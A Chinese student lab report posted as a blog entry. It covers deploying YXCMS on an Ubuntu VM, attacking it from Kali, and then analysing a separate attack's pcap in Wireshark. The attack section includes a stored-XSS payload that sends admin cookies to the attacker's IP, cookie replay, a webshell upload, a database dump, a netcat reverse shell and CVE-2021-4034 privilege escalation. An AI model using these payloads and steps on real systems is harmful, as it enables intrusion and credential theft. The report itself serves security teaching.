
<!DOCTYPE html>
<html lang="en ">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>宏兴的博客 || YXCMS安全研究</title>
    <meta name="author" content="宏兴">
    <meta name="description" content=" ">
    <meta name="keywords" content=" ">
    <link rel="icon" href="/images/PY.png">
    <link rel="stylesheet" href="/css/antd.min.css">
    
    <link rel="stylesheet" href="/css/full-theme.css">
    
    <script src="/js/vue.js"></script>
    <script src="/js/antd.min.js"></script>
<meta name="generator" content="Hexo 8.1.2"></head>

<body>

    <div id="loading"
        style="height: 100vh; width: 100%; position: fixed;display: flex;z-index: 200; justify-content: space-between;">
        <div id="loadleft" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div id="loadright" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div
            style="position: fixed; height: 100vh; width: 100%;display: flex;justify-content: center;align-items: center;">
            <div id="loadcontent"
                style="width:400px;height:400px;padding:50px;border-radius:50%;display:flex;justify-content:center;align-items:center;border:solid 10px#a3ddfb; text-align:center;opacity:1;transition:opacity 0.3s ease-out;">
                <div>
                    <h2>LOADING...</h2>
                    <p>加载过慢请开启缓存(浏览器默认开启)</p>
                    <div>
                        <img src="/dancingkitty.gif" alt="loading">
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div id="layout">
        <transition name="into">
            <div v-show="show_page" style="display: none;">
                <div id="menu_show">
                     
<nav id="menu">
    <div class="desktop-menu">
        <a href="/">
            <span class="title">宏兴的博客</span>
        </a>
        
        <a href="/">
            <span>
                <a-icon type="home" theme="filled" />
            </span>
            <span>首页</span>
        </a>
        
        <a href="/about">
            <span>
                <a-icon type="idcard" theme="filled" />
            </span>
            <span>关于</span>
        </a>
        
        <a href="/archives">
            <span>
                <a-icon type="folder" theme="filled" />
            </span>
            <span>归档</span>
        </a>
        
        <a href="/categories">
            <span>
                <a-icon type="book" theme="filled" />
            </span>
            <span>分类</span>
        </a>
        
        <a href="/tags">
            <span>
                <a-icon type="tags" theme="filled" />
            </span>
            <span>标签</span>
        </a>
        
    </div>

    <div :class="'phone-menu ' + menu_show" id="phone-menu">
        <div :class="'title'" @click="menu_show=!menu_show">
            <span style="margin-right: 10px;">
                <a-icon type="appstore" theme="filled" />
            </span>
            <span>宏兴的博客</span>
        </div>
        <div class="items" v-show="menu_show">
            
            <a href="/">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="home" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">首页</div>
                </div>
            </a>
            
            <a href="/about">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="idcard" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">关于</div>
                </div>
            </a>
            
            <a href="/archives">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="folder" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">归档</div>
                </div>
            </a>
            
            <a href="/categories">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="book" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">分类</div>
                </div>
            </a>
            
            <a href="/tags">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="tags" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">标签</div>
                </div>
            </a>
            
        </div>
        <div class="curtain" v-show="menu_show"></div>
    </div>

</nav>
                </div>

                <div id="main">
                     
<link rel="stylesheet" href="/css/post-body.css">
<div class="article">
    <div>
        <h1>YXCMS安全研究 </h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <a-icon type="calendar" theme="filled" />
            </span>
            2026/5/28
        </span>

        
        <span class="category">
            <a href="/categories/技术实践">
                <span class="icon">
                    <a-icon type="book" theme="filled" />
                </span>
                技术实践
            </a>
        </span>
        

        

        <span class="tags">
            <span class="icon">
                <a-icon type="tags" theme="filled" />
            </span>
            
            <span class="tag">
                
                <a href="/tags/YXCMS" style=color:#03a9f4>
                    YXCMS
                </a>
            </span>
            
            <span class="tag">
                
                <a href="/tags/Linux" style=color:#ffa2c4>
                    Linux
                </a>
            </span>
            
            <span class="tag">
                
                <a href="/tags/BurpSuite" style=color:#03a9f4>
                    BurpSuite
                </a>
            </span>
            
            <span class="tag">
                
                <a href="/tags/Wireshark" style=color:#ffa2c4>
                    Wireshark
                </a>
            </span>
            
            <span class="tag">
                
                <a href="/tags/Web安全" style=color:#00bcd4>
                    Web安全
                </a>
            </span>
            
        </span>
        
    </div>

    <div class="content" v-pre>
        <p>本次实践以YXCMS为目标系统，在Ubuntu 14.04上搭建LAMP环境并部署YXCMS建站系统，随后使用Kali进行渗透测试，包括NMAP扫描、Nikto扫描、SQL注入检测、XSS攻击、Cookie劫持、一句话木马上传、数据库导出及CVE-2021-4034提权等完整攻击链。最后通过Wireshark对流量包进行安全分析，还原攻击路径。</p>
<span id="more"></span>

<p>实践报告</p>
<p>姓名：<em>______________殷为__________________</em></p>
<p>学号：<em>_______2023240381006_____________</em></p>
<h1 id="任务一：网站搭建"><a href="#任务一：网站搭建" class="headerlink" title="任务一：网站搭建"></a>任务一：网站搭建</h1><p>完成一个典型的 web 网站搭建， web 网站为国内老牌建站CMS系统 YXCMS。</p>
<h2 id="虚拟机中安装靶机ubuntu14-04"><a href="#虚拟机中安装靶机ubuntu14-04" class="headerlink" title="虚拟机中安装靶机ubuntu14.04"></a>虚拟机中安装靶机ubuntu14.04</h2><p>虚拟机可选VMWare，安装增强工具<strong>可实现双向剪贴板和文件拖动功能</strong>。至ubuntu官网选择<strong>14.04</strong>版镜像安装。<strong>完成换源</strong>。将网络设置为<strong>NAT模式</strong>。</p>
<p><a target="_blank" rel="noopener" href="https://www.releases.ubuntu.com/14.04/">https://www.releases.ubuntu.com/14.04/</a></p>
<h3 id="安装LAMP系统"><a href="#安装LAMP系统" class="headerlink" title="安装LAMP系统"></a>安装LAMP系统</h3><p>安装LAMP（Linux+Apache+Mysql+Php）系统：</p>
<ol>
<li><p>安装apache：sudo apt-get install apache2</p>
</li>
<li><p>通过service apache2 status检查apache状态，确定正常运行；</p>
</li>
</ol>
<p>3、用浏览器访问127.0.0.1，可打开默认网页，说明apache安装成功；</p>
<ol start="4">
<li><p>查看apache2的配置文件：&#x2F;etc&#x2F;apache2 cat apache2.conf，以下是默认WEB服务地址：</p>
</li>
<li><p>安装php5：sudo apt-get install php5</p>
</li>
<li><p>安装apache对php的支持： sudo apt-get install libapache2-mod-php5</p>
</li>
<li><p>重启apache：sudo service apache2 restart</p>
</li>
<li><p>在默认WEB服务&#x2F;var&#x2F;www&#x2F;html&#x2F; 下新建一个index.php:</p>
</li>
</ol>
<blockquote>
<p>sudo gedit index.php</p>
</blockquote>
<p>保存关闭。</p>
<ol start="4">
<li>在浏览器中访问127.0.0.1&#x2F;index.php</li>
</ol>
<p>可以正确打开文件，内容显示正常表明php安装成功。</p>
<p>10、安装mysql：sudo apt-get install mysql-server。中间会要求设置root用户的密码，例如：123456</p>
<ol start="11">
<li><p>安装php对mysql的支持：sudo apt-get install php5-mysql</p>
</li>
<li><p>安装apache对mysql的支持：sudo apt-get install libapache2-mod-auth-mysql</p>
</li>
<li><p>安装mysql客户端：sudo apt-get install mysql-client</p>
</li>
<li><p>登录数据库查看：mysql -uroot -p</p>
</li>
</ol>
<h3 id="安装YXCMS"><a href="#安装YXCMS" class="headerlink" title="安装YXCMS"></a>安装YXCMS</h3><p>链接: <a target="_blank" rel="noopener" href="https://yun.139.com/shareweb//#/w/i/2s2xnunRxWE5w">https://yun.139.com/shareweb/\#/w/i/2s2xnunRxWE5w</a> 提取码:c06o</p>
<p>1、解压至网站目录下；</p>
<p>2、打开 http:&#x2F;&#x2F;你的网站根目录&#x2F;index.php，会自动跳转到程序安装页面；</p>
<p>如该页出现如下图所示的权限不足警告：</p>
<p>需要将警告所示目录赋权：sudo chmod -R 777 &#x2F;需要赋权的目录名</p>
<p>3、按照提示进行安装；</p>
<p>安装gd库：sudo apt-get install php5-gd，<strong>然后重启虚拟机</strong>使mysql数据库和gd扩展开启</p>
<p>（GD库，是php处理图形的扩展库，GD库提供了一系列用来处理图片的API，使用GD库可以处理图片，或者生成图片。网站中需要它来生成图形验证码）需要在状态全对钩后进入下一步继续安装。</p>
<ol>
<li>提示安装完成。</li>
</ol>
<p>YXCMS的默认安装配置和信息如下。</p>
<p>（1）网站前台访问地址： 你的网站根目录&#x2F;index.php</p>
<p>（2）网站后台访问地址： 你的网站根目录&#x2F;index.php?r&#x3D;admin&#x2F;index&#x2F;login</p>
<p>也可以简写为： 你的网站根目录&#x2F;index.php?r&#x3D;admin</p>
<p>（3）网站后台默认帐号密码</p>
<p>帐号：admin</p>
<p>密码：123456</p>
<p>（4）YXcms默认模版目录</p>
<hr>
<p>  <strong>目录</strong>                                <strong>说明</strong><br>  &#x2F;protected&#x2F;apps&#x2F;default&#x2F;view&#x2F;default&#x2F;   网站默认模版目录<br>  &#x2F;protected&#x2F;apps&#x2F;member&#x2F;view&#x2F;            网站会员模块模版目录<br>  &#x2F;public&#x2F;default&#x2F;default&#x2F;                网站默认附件目录（css，images，js）</p>
<hr>
<p>（5）YXcms默认模版说明</p>
<hr>
<p>  <strong>文件(夹)名</strong>          <strong>描述</strong><br>  404.php                 访问页面不存在时跳转的404模版<br>  acomment.php            评论表单和评论列表<br>  arightCom.php           右侧边栏演示模版<br>  extend_guestbook.php   在线留言模版<br>  extend_index.php       内容评论自定义表演示模版<br>  index_index.php        首页模版<br>  index_search.php       搜索结果页<br>  info.php                模版信息（包含模版名称和作者信息）<br>  layout.php              布局模版（可理解为模版入口，包含公共头部、尾部）<br>  news_content.php       资讯内容页<br>  news_index.php         资讯列表页<br>  news_sortindex.php     分类信息列表演示模版<br>  page_index.php         单篇模版<br>  photo_content.php      图集内容模版<br>  photo_index.php        图集列表模版<br>  photo_indexp.php       图集列表扩展字段演示模版<br>  photo_pcontent.php     图集内容扩展字段演示模版<br>  prightCom.php           右侧边栏演示模版</p>
<hr>
<p>（6）YXcms创建模版</p>
<hr>
<p>  <strong>模版文件名规则</strong>   <strong>说明</strong><br>  news_XXX.php        资讯栏目模版命名规则（”XXX“为自定义命名）<br>  photo_XXX.php       图集栏目模版命名规则（”XXX”为自定义命名）<br>  page_XXX.php        单页栏目模版命名规则（”XXX”为自定义命名）<br>  extend_XXX.php      表单栏目模版命名规则（”XXX”为自定义命名）</p>
<hr>
<p>（7）YXcms默认会员模块模版说明</p>
<hr>
<p>  <strong>文件(夹)名</strong>           <strong>描述</strong><br>  admingroup_add.php      后台模版（添加会员组）<br>  admingroup_edit.php     后台模版（编辑会员组）<br>  admingroup_index.php    后台模版（会员组列表）<br>  adminmember_edit.php    后台模版（编辑会员）<br>  adminmember_index.php   后台模版（会员列表）<br>  adminorder_detail.php   后台模版（订单详细）<br>  adminorder_index.php    后台模版（订单列表）<br>  index_index.php         会员中心首页模版<br>  index_login.php         会员中心登录模版<br>  index_regist.php        会员中心注册模版<br>  index_welcome.php       会员中心资料完善模版<br>  infor_index.php         会员中心修改密码模版<br>  infor_password.php      会员中心我的账户模版<br>  infor_rmb.php           会员中心欢迎页模版<br>  layout.php               会员中心布局模版（可理解为模版入口，包含公共头部、尾部）<br>  order_detail.php        会员中心订单信息模版<br>  order_index.php         会员中心订单管理模版<br>  shopcar_index.php       会员中心购物车模版</p>
<hr>
<p>（8）YXcms默认附件说明</p>
<hr>
<p>  <strong>文件夹</strong>   <strong>说明</strong><br>  css          css样式存放文件夹<br>  images       网站图片存放文件夹<br>  js           网站js文件存放文件夹<br>  ······       可自行定义其它文件夹</p>
<hr>
<p>5、将YXCMS设为该服务器默认网站：</p>
<p>修改网站根目录：在 &#x2F;etc&#x2F;apache2&#x2F;sites-available 中修改 000-default.conf配置文件，将其中的DocumentRoot &#x2F;var&#x2F;www&#x2F;html 修改为YXCMS所在目录：</p>
<p>&#x2F;var&#x2F;www&#x2F;html&#x2F;yinwei06&#x2F;YXCMS</p>
<p>重启apache：sudo service apache2 restart</p>
<p>在浏览器中访问本地地址127.0.0.1（或localhost），可直接访问网站。</p>
<p>Kali中打开，我的ubuntu ip：192.168.189.136</p>
<p><strong>任务二 WEB 渗透</strong></p>
<p>完成一个典型的 web 渗透流程，漏洞查找，渗透实施，获取权限，获取数据库数据的整个过程。</p>
<p><strong>攻击机kali写静态域名解析</strong></p>
<p>将域名解析写入&#x2F;etc&#x2F;hosts文件。</p>
<p>攻击机可以通过域名来访问靶机YXCMS：</p>
<p><strong>实验任务描述：YXCMS网站渗透</strong></p>
<p>YXCMS是被广泛使用的企业建站CMS，其诸多版本都有爆出漏洞，本次实验对YXCMS站点进行漏洞测试，使用kali作为攻击机，自行安装所需工具。基本要求：利用至少2个网站漏洞，获取主机权限、完成数据库拖库（拖库动作仅针对靶机可以实施）。</p>
<h2 id="NMAP扫描："><a href="#NMAP扫描：" class="headerlink" title="NMAP扫描："></a>NMAP扫描：</h2><p>1、启动NMAP，输入要扫描的网站域名：</p>
<p>得到结果如下：</p>
<p>根据以上内容，可以知道以下内容：</p>
<p>（1）目标域名: <a target="_blank" rel="noopener" href="http://www.yinwei06.com/">www.yinwei06.com</a></p>
<p>（2）IP地址: 192.168.189.136（这是一个私有IP地址，说明该网站在内网环境中）</p>
<p>（3）开放端口: 只有一个端口开放 - 80&#x2F;tcp（HTTP服务）</p>
<p>（4）其他端口: 999个TCP端口处于关闭状态</p>
<p>2、输入sudo nmap -sV -O -p- 192.168.189.136 -oN scan_report.txt，进行更全面的扫描：</p>
<p>根据以上内容，可以知道以下内容：</p>
<p>（1）服务器操作系统: Ubuntu Linux</p>
<p>（2）内核版本: 3.2 - 4.9 之间</p>
<p>（3）使用了虚拟化平台: VMware</p>
<p>（4）Web服务器: Apache 2.4.7</p>
<p>（5）网络距离: 1跳（同一局域网内）</p>
<h2 id="Nikto扫描："><a href="#Nikto扫描：" class="headerlink" title="Nikto扫描："></a>Nikto扫描：</h2><p>1、输入：sudo nikto -h <a target="_blank" rel="noopener" href="http://www.yinwei06.com/">http://www.yinwei06.com</a> -C all -Tuning 1234567890ab -o nikto_scan.html -F htm，这个命令可以进行全面的扫描，扫描结果如下：</p>
<p>2、根据上图内容，可以分析出以下结果：</p>
<p>高风险发现</p>
<p>（1）Apache版本过时 (2.4.7 → 至少2.4.54)，存在已知远程代码执行漏洞</p>
<p>（2）敏感目录暴露</p>
<p>&#x2F;data&#x2F; - 可能包含数据库或配置文件</p>
<p>&#x2F;protected&#x2F; - 敏感区域</p>
<p>&#x2F;public&#x2F; - 可能包含敏感文件</p>
<p>中风险发现</p>
<p>（1）目录索引开启</p>
<p>攻击者可直接浏览目录内容，&#x2F;protected&#x2F;, &#x2F;data&#x2F;, &#x2F;public&#x2F; 都可以直接访问</p>
<p>（2）robots.txt泄露敏感路径，&#x2F;robots.txt 文件暴露了 &#x2F;protected&#x2F; 和 &#x2F;data&#x2F; 目录，这些路径返回200状态码（可访问）</p>
<p>（3）缺少安全头部</p>
<p>无 X-Frame-Options（点击劫持风险）</p>
<p>无 X-Content-Type-Options（MIME类型混淆）</p>
<p>低风险发现</p>
<p>Cookie安全设置，PHPSESSID 缺少 HttpOnly 标志（XSS时可被窃取）</p>
<h2 id="Dirb进行扫描："><a href="#Dirb进行扫描：" class="headerlink" title="Dirb进行扫描："></a>Dirb进行扫描：</h2><p>1、输入dirb <a target="_blank" rel="noopener" href="http://www.yinwei06.com/">http://www.yinwei06.com</a> &#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;dirb&#x2F;big.txt -o dirb_scan.txt</p>
<p>结果如下：</p>
<p>2、对上图结果进行分析：</p>
<p>（1）&#x2F;data&#x2F; - 目录列表可查看</p>
<p>（2）&#x2F;protected&#x2F; - 目录列表可查看</p>
<p>（3）&#x2F;public&#x2F; - 目录列表可查看</p>
<p>（4）&#x2F;upload&#x2F; - 目录列表可查看 ⚠️高风险！</p>
<p>（5）&#x2F;robots.txt - 存在（之前已知）</p>
<p>（6）&#x2F;server-status - 403禁止访问</p>
<h2 id="SQL漏洞扫描："><a href="#SQL漏洞扫描：" class="headerlink" title="SQL漏洞扫描："></a>SQL漏洞扫描：</h2><p>1、输入sqlmap -u “<a target="_blank" rel="noopener" href="http://www.yinwei06.com/">http://www.yinwei06.com</a>“ –crawl&#x3D;3 –batch –level&#x3D;2进行SQL漏洞扫描，得到以下结果：</p>
<p>2、分析结果，没有发现SQL注入漏洞。</p>
<h2 id="文件上传漏洞测试"><a href="#文件上传漏洞测试" class="headerlink" title="文件上传漏洞测试"></a>文件上传漏洞测试</h2><p>1、输入curl -s <a target="_blank" rel="noopener" href="http://www.yinwei06.com/">http://www.yinwei06.com</a> | grep -i “upload\|file.*type”，出现以下内容：</p>
<p>2、没发现有利用价值的地方。</p>
<h2 id="从后台登录页面入手："><a href="#从后台登录页面入手：" class="headerlink" title="从后台登录页面入手："></a>从后台登录页面入手：</h2><p>1、访问后台登录页面&#x2F;index.php?r&#x3D;admin&#x2F;index&#x2F;login：</p>
<p>2、利用弱口令漏洞，尝试到用户：admin，密码：123456发现可以登录。</p>
<p><strong>重新整理思路，发现了有效的攻击手段</strong></p>
<h2 id="获取管理员cookie："><a href="#获取管理员cookie：" class="headerlink" title="获取管理员cookie："></a>获取管理员cookie：</h2><p>1、在留言板利用xss漏洞，在留言板输入&lt;svg&#x2F;onload&#x3D;”new Image().src&#x3D;’<a target="_blank" rel="noopener" href="http://172.20.10.2:8888/log?cookie=">http://172.20.10.2:8888/log?cookie=</a>‘ + btoa(document.cookie);”&gt;，其中172.20.10.2为我攻击时使用的电脑的ip：</p>
<p>2、编写python代码，获取cookie：</p>
<p>3、管理员在后台操作，查看留言时触发xss代码：</p>
<p>得到管理员的cookie：</p>
<h2 id="利用管理员cookie"><a href="#利用管理员cookie" class="headerlink" title="利用管理员cookie"></a>利用管理员cookie</h2><p>1、将获取的内容进行base64解码：</p>
<p>2、用Burp Suite抓包，将cookie替换成上图获取到的两个结果：</p>
<p>随便输入用户名和密码，然后进行抓包，抓包结果如下：</p>
<p>修改抓包结果：</p>
<p>（1）第1行的admin&#x2F;index&#x2F;login改成&#x2F;admin&#x2F;index&#x2F;index</p>
<p>（2）第13行的PHPSESSID的值改成获取到的<strong>1nbokv46n4su9bhla64ju5s200（重点）</strong></p>
<p>（3）第16行__hash__的值改成获取到的b868bDyJy1wmPsKZaxhUUS7NuOQwG8KdJqo0O</p>
<p>1wWGzwZ1ik6ShlpKb5%2BZsulipryJu%2B9Xy2Vhrzk8%2Fx9TP594P0pVrt%2BNaG2t3FjDg</p>
<p>修改后结果：</p>
<p>攻击结果如下图所示，<strong>但现在仍然有个缺陷，就是需要一直抓包，让cookie为</strong></p>
<p><strong>1nbokv46n4su9bhla64ju5s200：</strong></p>
<h2 id="上传一句话木马"><a href="#上传一句话木马" class="headerlink" title="上传一句话木马"></a>上传一句话木马</h2><p>1、进入网站模板界面：</p>
<p>2、选择“管理模板文件”，然后点击“新建”</p>
<p>3、编写一句话木马：</p>
<p>抓包改cookie再上传</p>
<p>4、用蚁剑连接：</p>
<p>连接成功后可以访问服务器的文件：</p>
<h2 id="入侵数据库信息："><a href="#入侵数据库信息：" class="headerlink" title="入侵数据库信息："></a>入侵数据库信息：</h2><p>1、找到config.php，我的路径是&#x2F;var&#x2F;www&#x2F;html&#x2F;yinwei06&#x2F;YXCMS&#x2F;protected&#x2F;config.php，打开后可以看到服务器的数据库root用户的密码：</p>
<p>2、在蚁剑右键目标网站，选择“数据操作”：</p>
<p>3、根据得到的用户名和密码登录数据库：</p>
<p>4、成功查看数据库中的内容：</p>
<p>5、点击“导出”，把数据库导出到攻击使用的电脑：</p>
<h2 id="提权："><a href="#提权：" class="headerlink" title="提权："></a>提权：</h2><p>1、用蚁剑新建一个php文件：</p>
<p>2、在本机cmd输入nc.exe -lvvp 4444，需要下载nc.exe，然后用浏览器访问上图的yw_rve.php，然后就可以使用反弹shell：</p>
<p>3、输入python -c ‘import pty; pty.spawn(“&#x2F;bin&#x2F;bash”)’，让反弹shell更稳定：</p>
<p>4、利用CVE-2021-4034漏洞，下载相关的代码<em>GitHub - berdav&#x2F;CVE-2021-4034: CVE-2021-4034 1day</em>，并且把下载到的内容用蚁剑上传到&#x2F;tmp目录下：</p>
<p>5、运行cve-2021-4034.sh：</p>
<p>6、查看当前权限：</p>
<h2 id="提权成功。任务三：WEB渗透的流量分析"><a href="#提权成功。任务三：WEB渗透的流量分析" class="headerlink" title="提权成功。任务三：WEB渗透的流量分析"></a>提权成功。任务三：WEB渗透的流量分析</h2><p>对一个典型的WEB渗透事件的网络数据流量进行分析，还原渗透步骤，是网络安全事件应急响应的基本技术。</p>
<p>本实验渗透事件的背景为：某攻击者使用扫描工具发现某公司的WEB服务网站的后台登录页面，通过爆破破解站点后台的账号和密码，之后通过上传木马建立webshell，寻找数据库配置信息，试图拖库。</p>
<p>网站的安全服务人员在攻击者拖库前及时发觉到内网被攻击，由于网站具备一定的安全措施，对全流量进行了存储，运维人员找到一些数据包，通过分析数据包还原出了黑客的攻击路径。</p>
<p>请根据提供的流量包回答下面有关问题。本实验用于学习网络安全事件应急响应和追踪溯源，本地分析网络数据包的一些基本步骤。使用的数据包为：2301-1.pcap，2301-2.pcap，为网卡抓取的全流量数据包。</p>
<p><strong>实验任务描述</strong></p>
<p>1、从流量数据中分析，攻击发起方的源 IP 地址是什么？被入侵目标服务器的目的 IP 地址是什么？</p>
<p>分析上图226409可知</p>
<p><strong>攻击者：192.168.94.59，主要目标：192.168.32.189</strong></p>
<p>2、目标服务器部署的网站系统，采用的是哪一款开源内容管理框架？</p>
<p>选择872</p>
<p><strong>目标服务器部署的网站系统采用的是 DouPHP</strong></p>
<p>3、攻击方在渗透前期，使用了哪款扫描工具对目标站点的目录和端口进行探测？</p>
<p>acunetix是AWVS的其中一个特征，搜索这个特征证明攻击手段是AWVS</p>
<p><strong>AWVS</strong></p>
<p>4、通过扫描工具的探测结果，攻击方最终定位到的网站后台管理登录页面的 URL 路径是什么？</p>
<p>根据上图Info最后一行：</p>
<p><strong><a target="_blank" rel="noopener" href="http://192.168.32.189/admin/login.php">http://192.168.32.189/admin/login.php</a></strong></p>
<p>5、攻击方对后台登录接口实施了暴力破解，成功登录系统的账号与密码分别是什么？</p>
<p>右键728915，选择tcp流</p>
<p><strong>账号：admin，密码：admin!@#pass123。</strong></p>
<p>6、除了对登录密码的暴力破解行为外，攻击方还尝试了哪些其他类型的网络攻击手段？</p>
<p>根据上图的筛选结果分析，使用了存储型XSS</p>
<p><strong>存储型XSS、SQL注入、远程代码执行</strong></p>
<p>7、攻击方成功登录后台后，上传了一个恶意脚本文件，请写出该文件的完整代码内容。</p>
<p>选择733805</p>
<p>再查找“1234”</p>
<p>选择734846</p>
<p>8、这个恶意脚本是一个什么文件？保存在什么位置？</p>
<p>双击点开734846</p>
<p><strong>这是PHP文件，在&#x2F;images&#x2F;article&#x2F;a.php</strong></p>
<p>9、攻击方通过上传的恶意脚本建立了控制会话，在这期间他还尝试发起了哪些攻击操作？</p>
<p><strong>网络侦察与主机发现</strong></p>
<p><strong>漏洞扫描与利用尝试</strong></p>
<p><strong>后台暴力破解与未授权访问</strong></p>
<p><strong>数据窃取与备份操作</strong></p>
<p><strong>持久化尝试</strong></p>
<p>10、攻击方在网站配置文件中窃取了数据库连接信息，请分别列出数据库服务器的 IP 地址、数据库名称、登录账号及对应的密码。</p>
<p>打开2301-2.pcap</p>
<p>点开第6个包：</p>
<p><strong>数据库IP地址：10.3.1.101</strong></p>
<p><strong>数据库名：Database（2）登录账号：web密码：</strong></p>
<p><strong>4bea612913261b76c158a1b225b8b623a3e5afb4</strong></p>
<p>11、攻击方在信息收集阶段访问了网站根目录下的 robots.txt 文件，该文件的作用是什么？文件中隐藏的 flag 字符串内容是什么？</p>
<p><strong>robots.txt 是一个网站爬虫排除协议文件，位于网站根目录。其主要作用是：告知网络爬虫哪些目录或文件可以&#x2F;不可以访问。防止敏感目录被索引。优化爬虫效率，避免爬虫抓取无意义的页面。</strong></p>
<p>点开439232在最下面找到flag</p>
<p><strong>flag：87b7cb79481f317bde90c116cf36084b</strong></p>
<p>12、目标服务器有几块网卡？分配到的IP地址分别是什么？分别对外提供什么服务？</p>
<p><strong>有两块，eth0：192.168.32.139 Web服务，eth1：10.3.3.100 MySQL客户端，lo：127.0.0.1<br>本地回环服务。</strong></p>
<p><strong>Wireshark 及常用过滤语法</strong></p>
<p>**常用语法 **</p>
<p>Wireshark（前称 Ethereal）是一个网络数据包分析软件。它可以截取网络数据包，并尽可能显示出最为详细的网络封包资料。Kali 自带该软件，windows 下需自行安装。</p>
<p>一些简单的过滤规则：</p>
<p>1) <strong>过滤源 ip、目的 ip</strong>。在 wireshark 的过滤规则框 Filter 中输入过滤条件。如查找目的地 址为 192.168.101.8 的包，ip.dst&#x3D;&#x3D;192.168.101.8；查找源地址为 ip.src&#x3D;&#x3D;1.1.1.1；</p>
<p>2) <strong>过滤端口</strong>。如过滤 80 端口，在 Filter 中输入，tcp.port&#x3D;&#x3D;80，这条规则是把源端口和目 的 端 口 为 80 的 都 过 滤 出 来 。 使 用 tcp.dstport&#x3D;&#x3D;80 只 过 滤 目 的 端 口 为 80 的 ， tcp.srcport&#x3D;&#x3D;80 只过滤源端口为 80 的包；</p>
<p>3) <strong>过滤协议</strong>。比较简单，直接在 Filter 框中直接输入协议名即可，如过滤 HTTP 的协议；</p>
<p>4) <strong>http 模 式 过 滤</strong> 。 如 过 滤 get 包 ， http.request.method&#x3D;&#x3D;”GET”, 过 滤 post 包，http.request.method&#x3D;&#x3D;”POST”；</p>
<p>5) <strong>连接符 and 的使用</strong>。过滤两种条件时，使用 and 连接，如过滤 ip 为 192.168.101.8 并且 为 http 协议的，ip.src&#x3D;&#x3D;192.168.101.8 and http。</p>
<p>6）**流跟踪。**Wireshark能够将来自不同的数据重组成统一的易读的格式，把客户端和服务器来往的数据都排好序并变得更易查看。一个HTTP数据包可包含多个TCP数据包，红色用来标明从源地址前往目标地址的流量。蓝色用来区分出相反方向，也就是从目标地址到源地址的流量。追踪TCP流可以看到更多的细节信息。对需要分析的数据点右键“追踪流-TCP流”可查看。</p>
<p><strong>常见的扫描器特征参考</strong></p>
<p>1. Appscan</p>
<p>Appscan在请求的Url，Headers, Body三项里随机包含了能代表自己的特征信息</p>
<p>2. Nessus</p>
<p>Nessus的特征主要在Url，Headers，Body中</p>
<p>3. Awvs（Acunetix Web Vulnerability Scanner ）版本10.5和11</p>
<p>Awvs在请求的Url，Headers, Body三项里随机包含了能代表自己的特征信息</p>
<p>4. Rsas</p>
<p>Rsas 的主要的特征在Url和Headers中</p>
<p><strong>常见后台地址</strong></p>
<p>1. admin</p>
<p>2. manager</p>
<p>3. login</p>
<p>4. system</p>
<p>Robots.txt&#x2F;Disallow</p>
<p>一般情况下，大多数网站创建者或管理员都会在网站的根目录放置一个名为robots.txt的文本文件，用来控制自己的网站哪些目录允许SE搜索引擎，爬行并收录，哪些目录禁止搜索引擎收录，Disallow，正是robots.txt文件中设置禁止搜索引擎收录哪些目录的一个词语。</p>
<p>**CMS **</p>
<p>通常会在回显页面的Powered by 字段显示</p>

    </div>

    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">
    <div id="comment">
        <div id="gitalk-container">
        </div>
    </div>
    
</div>
                     
<footer id="footer">
    <div class="footer-wrap">
        <div>
            © 2018 - 2026 宏兴的博客
            <span class="footer-icon">
                <a-icon type="flag" theme="filled" /></span>
            @宏兴
        </div>
        <div></div>
        <div>Based on the <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo Engine</a> & <a
                target="_blank" rel="noopener" href="https://github.com/korilin/hexo-theme-particle">Particle Theme</a></div>
        
    </div>

</footer>

<script src="/js/highlight.min.js"></script>
<script src="/js/particle.js"></script>
                </div>
            </div>
        </transition>
    </div>

    <script>
    new Vue({
        el: "#layout",
        data: {
            show_page: false,
            onload_menu: false,
            menu_show: false,
            card_top: 100
        },
        created: function () {
            var that = this
            window.onload = function () {
                that.show_page = true
                document.getElementById("loadcontent").style.opacity = 0
                setTimeout(function () {
                    document.getElementById("loadleft").style.width = 0
                    document.getElementById("loadright").style.width = 0
                }, 300)
                setTimeout(function () {
                    document.getElementById("loading").style = "display:none"
                }, 600)
            }
        },
        mounted: function () {
            var that = this
            window.addEventListener('scroll', function (e) {
                that.menu_show = false
            })
        },
        methods: {
            home_click: function () {
                window.scrollTo({
                    top: window.innerHeight - 80,
                    behavior: "smooth",
                });
            }
        }
    })
</script>

<script src="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>
<script>
    const gitalk = new Gitalk({
        clientID: '',
        clientSecret: '',
        repo: 'hexo-theme-particle',      // The repository of store comments,
        owner: 'korilin',
        admin: ['korilin'],
        language: 'zh-CN',
        id: location.pathname,      // Ensure uniqueness and length less than 50
        distractionFreeMode: true  // Facebook-like distraction free mode
    })
    gitalk.render('gitalk-container')
</script>

</body>

</html>